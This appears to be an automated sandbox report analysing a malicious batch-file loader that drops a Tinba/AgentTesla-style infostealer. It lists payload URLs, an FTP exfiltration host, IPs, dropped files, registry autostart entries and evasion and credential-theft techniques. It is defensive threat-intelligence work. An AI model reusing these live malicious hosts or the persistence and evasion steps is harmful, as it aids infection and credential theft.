                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545203 Sample: z1Transaction_ID_REF2418_cmd.bat Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 60 himalayastrek.com 2->60 62 ftp.haliza.com.my 2->62 64 2 other IPs or domains 2->64 80 Suricata IDS alerts for network traffic 2->80 82 Found malware configuration 2->82 84 Malicious sample detected (through community Yara rule) 2->84 86 14 other signatures 2->86 9 cmd.exe 1 2->9         started        11 Cllyjbrx.PIF 2->11         started        14 Cllyjbrx.PIF 2->14         started        16 2 other processes 2->16 signatures3 process4 signatures5 18 x.exe 1 6 9->18         started        23 extrac32.exe 8 9->23         started        25 conhost.exe 9->25         started        114 Writes to foreign memory regions 11->114 116 Allocates memory in foreign processes 11->116 118 Sample uses process hollowing technique 11->118 27 xrbjyllC.pif 11->27         started        120 Multi AV Scanner detection for dropped file 14->120 29 xrbjyllC.pif 14->29         started        process6 dnsIp7 66 himalayastrek.com 50.116.93.185, 443, 49730, 49731 UNIFIEDLAYER-AS-1US United States 18->66 52 C:\Users\Public\Libraries\xrbjyllC.pif, PE32 18->52 dropped 54 C:\Users\Public\Cllyjbrx.url, MS 18->54 dropped 88 Multi AV Scanner detection for dropped file 18->88 90 Creates multiple autostart registry keys 18->90 92 Drops PE files with a suspicious file extension 18->92 106 4 other signatures 18->106 31 xrbjyllC.pif 16 4 18->31         started        36 cmd.exe 1 18->36         started        38 esentutl.exe 2 18->38         started        56 C:\Users\user\AppData\Local\Temp\x.exe, PE32 23->56 dropped 94 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 27->94 96 Tries to steal Mail credentials (via file / registry access) 27->96 98 Tries to harvest and steal ftp login credentials 27->98 100 Tries to harvest and steal browser information (history, passwords, etc) 27->100 102 Hides that the sample has been downloaded from the Internet (zone.identifier) 29->102 104 Installs a global keyboard hook 29->104 file8 signatures9 process10 dnsIp11 68 ftp.haliza.com.my 110.4.45.197, 21, 49733, 49734 EXABYTES-AS-APExaBytesNetworkSdnBhdMY Malaysia 31->68 70 api.ipify.org 172.67.74.152, 443, 49732, 49740 CLOUDFLARENETUS United States 31->70 48 C:\Users\user\AppData\Roaming\...\sgxIb.exe, PE32 31->48 dropped 72 Detected unpacking (changes PE section rights) 31->72 74 Detected unpacking (overwrites its own PE header) 31->74 76 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 31->76 78 5 other signatures 31->78 40 esentutl.exe 2 36->40         started        44 conhost.exe 36->44         started        50 C:\Users\Public\Libraries\Cllyjbrx.PIF, PE32 38->50 dropped 46 conhost.exe 38->46         started        file12 signatures13 process14 file15 58 C:\Users\Public\alpha.pif, PE32 40->58 dropped 108 Drops PE files to the user root directory 40->108 110 Drops PE files with a suspicious file extension 40->110 112 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 40->112 signatures16

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  z1Transaction_ID_REF2418_cmd.bat24%ReversingLabsWin32.Trojan.Malcab

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\Public\Libraries\Cllyjbrx.PIF32%ReversingLabsWin32.Infostealer.Tinba
                  C:\Users\Public\Libraries\xrbjyllC.pif3%ReversingLabs
                  C:\Users\Public\alpha.pif0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\x.exe32%ReversingLabsWin32.Infostealer.Tinba
                  C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe3%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://api.ipify.org/0%URL Reputationsafe
                  http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl00%URL Reputationsafe
                  https://api.ipify.org0%URL Reputationsafe
                  https://sectigo.com/CPS00%URL Reputationsafe
                  https://account.dyn.com/0%URL Reputationsafe
                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                  http://ocsp.sectigo.com00%URL Reputationsafe
                  http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#0%URL Reputationsafe
                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
                  https://api.ipify.org/t0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bg.microsoft.map.fastly.net
                  		199.232.210.172
                  		truefalse
                    		unknown
                    himalayastrek.com
                    		50.116.93.185
                    		truetrue
                      		unknown
                      api.ipify.org
                      		172.67.74.152
                      		truetrue
                        		unknown
                        ftp.haliza.com.my
                        		110.4.45.197
                        		truetrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/true
                          • URL Reputation: safe
                          		unknown
                          https://himalayastrek.com/origins/233_Cllyjbrxmngtrue
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://api.ipify.orgxrbjyllC.pif, 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885700149.0000000029C91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.0000000022711000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://sectigo.com/CPS0x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://account.dyn.com/xrbjyllC.pif, 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://ftp.haliza.com.myxrbjyllC.pif, 00000009.00000002.1885700149.0000000029D6E000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026FED000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.00000000227AD000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              http://ocsp.sectigo.com0x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://himalayastrek.com/origins/233_CllyjbrxmngHACllyjbrx.PIF, 0000000A.00000002.1827777323.000000000061C000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://himalayastrek.com/-x.exe, 00000003.00000002.1721962152.000000000085E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://himalayastrek.com/origins/233_CllyjbrxmngyCllyjbrx.PIF, 0000000A.00000002.1827777323.000000000064E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://himalayastrek.com/origins/233_CllyjbrxmngZCllyjbrx.PIF, 0000000A.00000002.1827777323.000000000061C000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://api.ipify.org/txrbjyllC.pif, 00000009.00000002.1885700149.0000000029C91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.0000000022711000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://himalayastrek.com:443/origins/233_CllyjbrxmngPx.exe, 00000003.00000002.1721962152.000000000089F000.00000004.00000020.00020000.00000000.sdmp, Cllyjbrx.PIF, 00000010.00000002.1997779443.00000000008BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namexrbjyllC.pif, 00000009.00000002.1885700149.0000000029C91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.0000000022711000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.pmail.comx.exe, x.exe, 00000003.00000002.1753574596.0000000021905000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1750879233.0000000020F1D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1759764048.000000007FE2F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1752975519.0000000021700000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668677681.000000007FBDF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668442812.0000000003028000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1721962152.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1723790812.000000000302C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000000.1719344100.0000000000416000.00000002.00000001.01000000.00000007.sdmp, xrbjyllC.pif, 0000000B.00000000.1826114660.0000000000416000.00000002.00000001.01000000.00000007.sdmp, sgxIb.exe, sgxIb.exe, 0000000D.00000002.1890633912.0000000000416000.00000002.00000001.01000000.0000000C.sdmp, sgxIb.exe, 0000000D.00000000.1888350846.0000000000416000.00000002.00000001.01000000.0000000C.sdmp, xrbjyllC.pif, 00000011.00000002.2937816421.0000000025B6E000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000000.1995988945.0000000000416000.00000002.00000001.01000000.00000007.sdmp, sgxIb.exe, 00000012.00000002.2055006675.0000000000416000.00000002.00000001.01000000.0000000C.sdmp, sgxIb.exe, 00000012.00000000.2054308600.0000000000416000.00000002.00000001.01000000.0000000C.sdmp, sgxIb.exe.9.dr, xrbjyllC.pif.3.drfalse
                                          		unknown
                                          http://ocsp.sectigo.com0Cx.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://himalayastrek.com/Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000061C000.00000004.00000020.00020000.00000000.sdmp, Cllyjbrx.PIF, 00000010.00000002.1997779443.0000000000848000.00000004.00000020.00020000.00000000.sdmptrue
                                              		unknown
                                              https://himalayastrek.com:443/origins/233_CllyjbrxmngCllyjbrx.PIF, 0000000A.00000002.1827777323.0000000000669000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                50.116.93.185
                                                		himalayastrek.comUnited States
                                                		46606UNIFIEDLAYER-AS-1UStrue
                                                110.4.45.197
                                                		ftp.haliza.com.myMalaysia
                                                		46015EXABYTES-AS-APExaBytesNetworkSdnBhdMYtrue
                                                172.67.74.152
                                                		api.ipify.orgUnited States
                                                		13335CLOUDFLARENETUStrue

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1545203
                                                Start date and time:2024-10-30 08:34:06 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 10m 21s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:20
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:z1Transaction_ID_REF2418_cmd.bat
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winBAT@25/11@3/3
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:
                                                • Successful, ratio: 98%
                                                • Number of executed functions: 172
                                                • Number of non-executed functions: 84
                                                Cookbook Comments:
                                                • Found application associated with file extension: .bat

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                • Excluded IPs from analysis (whitelisted): 172.202.163.200, 52.165.164.15, 13.85.23.206, 4.175.87.197
                                                • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: z1Transaction_ID_REF2418_cmd.bat

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                03:34:57API Interceptor2x Sleep call for process: x.exe modified
                                                03:35:07API Interceptor395508x Sleep call for process: xrbjyllC.pif modified
                                                03:35:10API Interceptor2x Sleep call for process: Cllyjbrx.PIF modified
                                                07:35:01AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Cllyjbrx C:\Users\Public\Cllyjbrx.url
                                                07:35:10AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sgxIb C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                07:35:18AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Cllyjbrx C:\Users\Public\Cllyjbrx.url
                                                07:35:26AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sgxIb C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                50.116.93.185z1SWIFT_MT103_Payment_552016_cmd.batGet hashmaliciousDBatLoader, FormBookBrowse
                                                  Order Specifications for Materials.docx.vbsGet hashmaliciousDBatLoader, FormBookBrowse
                                                    110.4.45.197z20SWIFT_MT103_Payment_552016_pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      Order Specifications for Materials.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        z14Employee_Contract_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                          Order Specifications for Materials.docx.exeGet hashmaliciousAgentTeslaBrowse
                                                            DHL_Shipment_Details_8th_October.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                              z92BankPayment38_735.exeGet hashmaliciousAgentTeslaBrowse
                                                                Bank Payment $38,735.exeGet hashmaliciousAgentTeslaBrowse
                                                                  rQuotation3200025006.exeGet hashmaliciousAgentTeslaBrowse
                                                                    z38PO_20248099-1_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                      z64MT103_126021720924_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                        172.67.74.15267065b4c84713_Javiles.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                        • api.ipify.org/
                                                                        Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                                        • api.ipify.org/
                                                                        4F08j2Rmd9.binGet hashmaliciousXmrigBrowse
                                                                        • api.ipify.org/
                                                                        y8tCHz7CwC.binGet hashmaliciousXmrigBrowse
                                                                        • api.ipify.org/
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                        • api.ipify.org/
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                        • api.ipify.org/
                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                        • api.ipify.org/
                                                                        file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                        • api.ipify.org/
                                                                        Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                                        • api.ipify.org/
                                                                        2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                                                                        • api.ipify.org/

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        himalayastrek.comz1SWIFT_MT103_Payment_552016_cmd.batGet hashmaliciousDBatLoader, FormBookBrowse
                                                                        • 50.116.93.185
                                                                        Order Specifications for Materials.docx.vbsGet hashmaliciousDBatLoader, FormBookBrowse
                                                                        • 50.116.93.185
                                                                        bg.microsoft.map.fastly.netOrden de Compra.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                        • 199.232.214.172
                                                                        PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                        • 199.232.210.172
                                                                        Order Pdf.exeGet hashmaliciousDBatLoaderBrowse
                                                                        • 199.232.210.172
                                                                        https://trvelocity.petra-dee.org/index.php/campaigns/ao946pbrfq631/track-url/lk782m0eyna84/24e9f9ecc31181de7c43e9793836ee263a7fcd94%20%20office365_event_type%20alertGet hashmaliciousUnknownBrowse
                                                                        • 199.232.214.172
                                                                        cotizaci#U00f2n.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                        • 199.232.210.172
                                                                        DHL TRACKING.exeGet hashmaliciousFormBookBrowse
                                                                        • 199.232.210.172
                                                                        https://www.google.im/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s/creditodigitalelmo.com.br/solo/i2975ufuy18zkhauvhibzzxy/YWRzQGJldHdlZW4udXM=Get hashmaliciousHTMLPhisherBrowse
                                                                        • 199.232.214.172
                                                                        https://alcatrazpackages.com/elchapo.htmlGet hashmaliciousUnknownBrowse
                                                                        • 199.232.214.172
                                                                        completedfiles.....pdfGet hashmaliciousUnknownBrowse
                                                                        • 199.232.214.172
                                                                        https://docs.google.com/uc?export=download&id=1gucHUhrnC0jRDGAhRfRkCK8rYqf0o3cvGet hashmaliciousUnknownBrowse
                                                                        • 199.232.214.172
                                                                        ftp.haliza.com.myz20SWIFT_MT103_Payment_552016_pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 110.4.45.197
                                                                        Order Specifications for Materials.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 110.4.45.197
                                                                        z14Employee_Contract_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 110.4.45.197
                                                                        Order Specifications for Materials.docx.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 110.4.45.197
                                                                        DHL_Shipment_Details_8th_October.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 110.4.45.197
                                                                        z92BankPayment38_735.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 110.4.45.197
                                                                        Bank Payment $38,735.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 110.4.45.197
                                                                        rQuotation3200025006.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 110.4.45.197
                                                                        z38PO_20248099-1_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 110.4.45.197
                                                                        z64MT103_126021720924_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 110.4.45.197
                                                                        api.ipify.orgPurchase Order PO61000016222.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 104.26.12.205
                                                                        Statement JULY #U007e SEP 2024 USD 19,055.00.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 172.67.74.152
                                                                        EVER ABILITY V66 PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 104.26.13.205
                                                                        MV. NORDRHONE VSL's PARTICULARS.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 104.26.13.205
                                                                        MUM - VESSEL'S PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 104.26.13.205
                                                                        INVOICE.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 172.67.74.152
                                                                        Bill_Of _Lading.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 172.67.74.152
                                                                        Shipping documents 00029399400059.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 172.67.74.152
                                                                        z20SWIFT_MT103_Payment_552016_pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 104.26.12.205
                                                                        file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                        • 172.67.74.152

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        EXABYTES-AS-APExaBytesNetworkSdnBhdMYz20SWIFT_MT103_Payment_552016_pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 110.4.45.197
                                                                        Order Specifications for Materials.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 110.4.45.197
                                                                        z14Employee_Contract_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 110.4.45.197
                                                                        Order Specifications for Materials.docx.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 110.4.45.197
                                                                        na.elfGet hashmaliciousMiraiBrowse
                                                                        • 203.142.6.25
                                                                        05NN8zSK04.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 103.6.198.178
                                                                        file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                                                        • 103.6.198.219
                                                                        DHL_Shipment_Details_8th_October.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 110.4.45.197
                                                                        file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                                                        • 103.6.198.219
                                                                        z92BankPayment38_735.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 110.4.45.197
                                                                        UNIFIEDLAYER-AS-1USz1SWIFT_MT103_Payment_552016_cmd.batGet hashmaliciousDBatLoader, FormBookBrowse
